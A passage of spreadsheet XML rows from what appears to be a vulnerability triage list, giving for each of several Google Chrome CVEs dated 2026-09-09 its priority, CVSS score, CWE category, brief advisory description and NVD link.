      <c r="H5692" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5692" s="5" t="inlineStr"/>
      <c r="K5692" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5692" s="5" t="inlineStr">
        <is>
          <t>Information leak in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87461</t>
        </is>
      </c>
    </row>
    <row r="5693">
      <c r="A5693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87466</t>
        </is>
      </c>
      <c r="C5693" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5693" s="5" t="inlineStr"/>
      <c r="F5693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5693" s="5" t="inlineStr"/>
      <c r="H5693" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5693" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5693" s="5" t="inlineStr"/>
      <c r="K5693" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5693" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Workers in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87466</t>
        </is>
      </c>
    </row>
    <row r="5694">
      <c r="A5694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87495</t>
        </is>
      </c>
      <c r="C5694" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5694" s="5" t="inlineStr"/>
      <c r="F5694" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5694" s="5" t="inlineStr"/>
      <c r="H5694" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5694" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5694" s="5" t="inlineStr"/>
      <c r="K5694" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5694" s="5" t="inlineStr">
        <is>
          <t>Information leak in Scroll in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87495</t>
        </is>
      </c>
    </row>
    <row r="5695">
      <c r="A5695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87497</t>
        </is>
      </c>
      <c r="C5695" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5695" s="5" t="inlineStr"/>
      <c r="F5695" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5695" s="5" t="inlineStr"/>
      <c r="H5695" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5695" s="5" t="inlineStr"/>
      <c r="K5695" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5695" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87497</t>
        </is>
      </c>
    </row>
    <row r="5696">
      <c r="A5696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87508</t>
        </is>
      </c>
      <c r="C5696" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5696" s="5" t="inlineStr"/>
      <c r="F5696" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5696" s="5" t="inlineStr"/>
      <c r="H5696" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5696" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5696" s="5" t="inlineStr"/>
      <c r="K5696" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5696" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87508</t>
        </is>
      </c>
    </row>
    <row r="5697">
      <c r="A5697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87516</t>
        </is>
      </c>
      <c r="C5697" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5697" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5697" s="5" t="inlineStr"/>
      <c r="F5697" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5697" s="5" t="inlineStr"/>
      <c r="H5697" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5697" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5697" s="5" t="inlineStr"/>
      <c r="K5697" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L5697" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87516</t>
        </is>
      </c>
    </row>
    <row r="5698">
      <c r="A5698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87543</t>
        </is>
      </c>
      <c r="C5698" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5698" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5698" s="5" t="inlineStr"/>
      <c r="F5698" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5698" s="5" t="inlineStr"/>
      <c r="H5698" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5698" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5698" s="5" t="inlineStr"/>
      <c r="K5698" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5698" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87543</t>
        </is>
      </c>
    </row>
    <row r="5699">
      <c r="A5699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87546</t>
        </is>
      </c>
      <c r="C5699" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5699" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5699" s="5" t="inlineStr"/>
      <c r="F5699" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5699" s="5" t="inlineStr"/>
      <c r="H5699" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I5699" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5699" s="5" t="inlineStr"/>
      <c r="K5699" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L5699" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87546</t>
        </is>
      </c>
    </row>
    <row r="5700">
      <c r="A5700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87548</t>
        </is>
      </c>
      <c r="C5700" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5700" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5700" s="5" t="inlineStr"/>
      <c r="F5700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5700" s="5" t="inlineStr"/>
      <c r="H5700" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5700" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5700" s="5" t="inlineStr"/>
      <c r="K5700" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L5700" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Installer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87548</t>
        </is>
      </c>
    </row>
    <row r="5701">
      <c r="A5701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87550</t>
        </is>
      </c>
      <c r="C5701" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5701" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5701" s="5" t="inlineStr"/>
      <c r="F5701" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5701" s="5" t="inlineStr"/>
      <c r="H5701" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5701" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5701" s="5" t="inlineStr"/>
      <c r="K5701" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L5701" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in CSS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87550</t>
        </is>
      </c>
    </row>
    <row r="5702">
      <c r="A5702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87551</t>
        </is>
      </c>
      <c r="C5702" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5702" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5702" s="5" t="inlineStr"/>
      <c r="F5702" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5702" s="5" t="inlineStr"/>
      <c r="H5702" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5702" s="5" t="inlineStr"/>
      <c r="K5702" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L5702" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87551</t>
        </is>
      </c>
    </row>
    <row r="5703">
      <c r="A5703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87556</t>
        </is>
      </c>
      <c r="C5703" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5703" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5703" s="5" t="inlineStr"/>
      <c r="F5703" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5703" s="5" t="inlineStr"/>
      <c r="H5703" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5703" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5703" s="5" t="inlineStr"/>
      <c r="K5703" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5703" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87556</t>
        </is>
      </c>
    </row>
    <row r="5704">
      <c r="A5704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87557</t>
        </is>
      </c>
      <c r="C5704" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5704" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5704" s="5" t="inlineStr"/>
      <c r="F5704" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5704" s="5" t="inlineStr"/>
      <c r="H5704" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5704" s="5" t="inlineStr"/>
      <c r="K5704" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5704" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in LocalNetworkAccess in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87557</t>
        </is>
      </c>
    </row>
    <row r="5705">
      <c r="A5705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87560</t>
        </is>
      </c>
      <c r="C5705" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5705" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5705" s="5" t="inlineStr"/>
      <c r="F5705" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5705" s="5" t="inlineStr"/>
      <c r="H5705" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5705" s="5" t="inlineStr"/>
      <c r="K5705" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5705" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87560</t>
        </is>
      </c>
    </row>
    <row r="5706">
      <c r="A5706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87561</t>
        </is>
      </c>
      <c r="C5706" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5706" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5706" s="5" t="inlineStr"/>
      <c r="F5706" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5706" s="5" t="inlineStr"/>
      <c r="H5706" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5706" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5706" s="5" t="inlineStr"/>
      <c r="K5706" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5706" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87561</t>
        </is>
      </c>
    </row>
    <row r="5707">
      <c r="A5707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87562</t>
        </is>
      </c>
      <c r="C5707" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5707" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5707" s="5" t="inlineStr"/>
      <c r="F5707" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5707" s="5" t="inlineStr"/>
      <c r="H5707" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="I5707" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5707" s="5" t="inlineStr"/>
      <c r="K5707" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L5707" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Accessibility in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87562</t>
        </is>
      </c>
    </row>
    <row r="5708">
      <c r="A5708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87563</t>
        </is>
      </c>
      <c r="C5708" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5708" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5708" s="5" t="inlineStr"/>
      <c r="F5708" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5708" s="5" t="inlineStr"/>
      <c r="H5708" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5708" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5708" s="5" t="inlineStr"/>
      <c r="K5708" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L5708" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Paint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87563</t>
        </is>
      </c>
    </row>
    <row r="5709">
      <c r="A5709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87564</t>
        </is>
      </c>
      <c r="C5709" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5709" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5709" s="5" t="inlineStr"/>
      <c r="F5709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5709" s="5" t="inlineStr"/>
      <c r="H5709" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5709" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5709" s="5" t="inlineStr"/>
      <c r="K5709" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L5709" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M5709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87564</t>
        </is>
      </c>
    </row>
    <row r="5710">
      <c r="A5710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87567</t>
        </is>
      </c>
      <c r="C5710" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5710" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5710" s="5" t="inlineStr"/>
      <c r="F5710" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5710" s="5" t="inlineStr"/>
      <c r="H5710" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5710" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5710" s="5" t="inlineStr"/>
      <c r="K5710" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5710" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in UrlFormatting in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof address bar via a crafted domain name. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87567</t>
        </is>
      </c>
    </row>
    <row r="5711">
      <c r="A5711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87568</t>
        </is>
      </c>
      <c r="C5711" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5711" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5711" s="5" t="inlineStr"/>
      <c r="F5711" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5711" s="5" t="inlineStr"/>
      <c r="H5711" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5711" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5711" s="5" t="inlineStr"/>
      <c r="K5711" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5711" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Chromium in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87568</t>
        </is>
      </c>
    </row>
    <row r="5712">
      <c r="A5712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87573</t>
        </is>
      </c>
      <c r="C5712" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5712" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5712" s="5" t="inlineStr"/>
      <c r="F5712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5712" s="5" t="inlineStr"/>
      <c r="H5712" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5712" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5712" s="5" t="inlineStr"/>
      <c r="K5712" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5712" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87573</t>
        </is>
      </c>
    </row>
    <row r="5713">
      <c r="A5713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87574</t>
        </is>
      </c>
      <c r="C5713" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5713" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5713" s="5" t="inlineStr"/>
      <c r="F5713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5713" s="5" t="inlineStr"/>
      <c r="H5713" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5713" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5713" s="5" t="inlineStr"/>
      <c r="K5713" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5713" s="5" t="inlineStr">
        <is>
          <t>Information leak in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87574</t>
        </is>
      </c>
    </row>
    <row r="5714">
      <c r="A5714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87577</t>
        </is>
      </c>
      <c r="C5714" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5714" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5714" s="5" t="inlineStr"/>
      <c r="F5714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5714" s="5" t="inlineStr"/>
      <c r="H5714" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I5714" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5714" s="5" t="inlineStr"/>
      <c r="K5714" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5714" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87577</t>
        </is>
      </c>
    </row>
    <row r="5715">
      <c r="A5715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
